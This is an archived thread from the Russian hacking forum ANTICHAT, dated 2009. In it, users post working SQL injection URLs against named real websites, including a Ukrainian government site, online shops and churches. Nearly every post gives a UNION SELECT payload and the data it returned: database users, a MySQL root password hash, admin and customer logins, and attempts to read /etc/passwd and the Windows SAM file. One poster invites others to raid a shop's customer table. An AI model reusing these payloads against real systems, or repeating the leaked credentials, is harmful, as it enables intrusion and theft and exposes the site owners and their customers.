ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11221  
Старый 11.11.2009, 17:22
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

history.uk.com -
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/version(),2/**/FROM/**/mysql.user/*
version - 5.0.20-log
user - root@localhost
database - history

mysql.user
user - root
password - C08D908F016260368DD6A842F1E03730F8FD0D20
фильтраця - p
file_priv - Y
http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),user,password,'p',file_pr iv),2/**/FROM/**/mysql.user/*

etc/passwd

http://www.history.uk.com/mailing/index.php?iD=0/**/and/**/1=2%20/**/union/**/all/**/select/**/load_file('/etc/passwd'),2/**/FROM/**/mysql.user/*
 
Ответить с цитированием

  #11222  
Старый 11.11.2009, 19:32
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Республика Алтай :: официальный интернет-портал
тИЦ: 600
PR: 6


Цитата:
http://www.altai-republic.com/modules.php?op=modload&name=Sections&file=index&re q=viewarticle&artid=20000+union+select+1,2,concat_ ws(0x3a,database(),user(),version()),4,5&page=1
Код:
altaire8_ra:altaire8_ra@localhost:4.1.25-log
Работаем за спасибо!)
 
Ответить с цитированием

  #11223  
Старый 11.11.2009, 20:59
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию

Код:
http://www.cyclosprint.eu/shop.php?cid=93&hmID=-1+union+select+1,concat_ws(%27;%27,login,password),3,4,5,6,7,8,9+from+users_admin+limit+1,1/*
Код:
http://www.cap-press.com/cart.php?add=-1+union+select+1,version()--
5.0.67-log
5 версия
capsci_r@209.68.2.28
capsci_bookdb

Таблицы:
Код:
auth_scr
auth_scr_reply
authbook
authors
book_links
books
books_forwarding
books_link
books_tmp
booksubj
contacts
discounts
frontpage
minosubjects
misc
orders
page_contents
series
series_book
subjects
supps
tms
tracklog
Код:
http://www.euroinf.it/shop/shop.php?id=-1 union select 1,2,3,Column_Name,5,6,7,8 from INFORMATION_SCHEMA.Columns where Table_Name=0x636c69656e746932/*
Тут видны все таблы:
Код:
http://www.euroinf.it/shop/shop.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*

Последний раз редактировалось jokester; 11.11.2009 в 21:02.. Причина: хеш админка
 
Ответить с цитированием

  #11224  
Старый 11.11.2009, 21:55
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Говермент)

MySQL 5.0.45-community-nt
сервер на винде
http://odpa14.gov.ua/?_npp=-3746+union+select+1,concat_ws(0x3a,user,0x3a,passw ord,0x3a,file_priv)+from+mysql.user

http://odpa14.gov.ua/?_npp=-3746+union+select+1,hex(load_file(0x633a2f77696e64 6f77732f7265706169722f73616d)) - чтение файлов на сервере. файл sam
 
Ответить с цитированием

  #11225  
Старый 11.11.2009, 23:36
onbka
Новичок
Регистрация: 29.10.2009
Сообщений: 15
Провел на форуме:
109810

Репутация: 17
По умолчанию

Цитата:
http://housewives.org.ua/text.php?id=-689 union select 1,2,3,4,concat_ws(0x3a,version(),user(),databa se()) --
4.1.25-log:freemp3_slovo@193.200.173.5:freemp3_slovo
 
Ответить с цитированием

  #11226  
Старый 12.11.2009, 00:45
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

PR4
Код:
http://www.proconsim.ru/cat.php?m=-1+union+select+1,2,3,concat_ws(0x3a,user(),%20version(),%20database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
PR1
Код:
http://www.czech-tech.ru/index.php?dword=catalog&id=10+union+select+1,2,3,table_name+from+INFORMATION_SCHEMA.TABLES+LIMIT+1,1 --
PR3
Код:
http://www.baurum.ru/_library/?cat=pipes-plastic&id=-9999+union+select+1,2,concat_ws(0x3a,%20version(),%20user(),%20database()),4,5,6,7,8,9,10,11,12/*

Последний раз редактировалось [aywo]; 12.11.2009 в 02:14..
 
Ответить с цитированием

  #11227  
Старый 12.11.2009, 01:49
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Код:
http://www.slavgorod.ru/admin/editnews.php?id=3775{SQL}
login: ' or 1=1/*
password: ' or 1=1/*

Код:
http://www.slavgorod.ru/admin/
ТИЦ: 230
PR: 3
 
Ответить с цитированием

  #11228  
Старый 12.11.2009, 02:44
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Секас-шоп, закупаемся ^^

http://www.extremerestraints.com/tell_a_friend.php?products_id=1248+union+select+*+ from+(select+*+from+(select+name_const((select+con cat_ws(0x2F,customers_email_address,customers_pass word)+from+customers+limit+0,1),14)d)+as+t+join+(s elect+name_const((select+concat_ws(0x2F,customers_ email_address,customers_password)+from+customers+l imit+0,1),14)e)b)a--+
 
Ответить с цитированием

  #11229  
Старый 12.11.2009, 17:01
hack-win32
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588

Репутация: 99
По умолчанию

infofir_seadmin@98.130.0.136:infofir_SE:5.0.41-community-log[/B]
Код:
http://www.senesco.com/newsitem.php?id=-168+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version())--

monkey0_nick@localhost:monkey0_jo151:4.0.27-standard
Код:
http://www.nivb.com/newsitem.php?item=-122+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
u10118317@lon1-webmysql-2.msh.demon.net:u10118317:4.0.30-log
Код:
http://www.jadeprint.com/newsitem.php?recordID=-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8--

alvin@205.178.145.65:alvinsingleton:4.1.22-log
Код:
http://www.alvinsingleton.com/newsitem.php?id=-3+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4--

web108-craven@localhost:web108-craven:5.0.86-community
Код:
http://www.craven-property.com/newsItem.php?id=-51+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7--

blackroc_website@localhost:blackroc_general:5.0.77-community
Код:
http://blackrockspeedway.net/news/newsItem.php?tag=1&year=2009&item=-9+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())--

alteuser@localhost:alte:4.0.22
Код:
http://www.alte.org/news/newsitem.php?newsID=-197+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--

njwfadb@208.109.181.105:njwfadb:4.1.22-max-log
Код:
http://www.njworkingfamilies.org/newsItem.php?nwID=-34+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6--

fiddlefolk@localhost:fiddlefolk:5.1.35
Код:
http://www.fiddleworkshop.co.uk/newsitem.php?id=-84+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5--

churchdbuser@localhost:church:5.0.22-Debian_0ubuntu6.06.9-log
Код:
http://www.churchbuyinggroup.co.uk/newsitem.php?news_id=-7+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7--

danielkawczynski@localhost:danielkawczynski:5.0.51 a-3ubuntu5.4
Код:
http://www.daniel4shrewsbury.co.uk/newsitem.php?newsid=-15+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--
 
Ответить с цитированием

  #11230  
Старый 12.11.2009, 21:15
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

вывод в ошибке
Цитата:
http://survey.tpg.nl/php/main.phtml?c-Object=surv&c-Action=showform&c-Mode=test&ID=334+union+select+1,2,3,4,5,6,7,8,9,10 ,user(),12,13,14,15,16,17+limit+1,1/*
version()=4.0.21
user()=tpgsurveyuser3@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ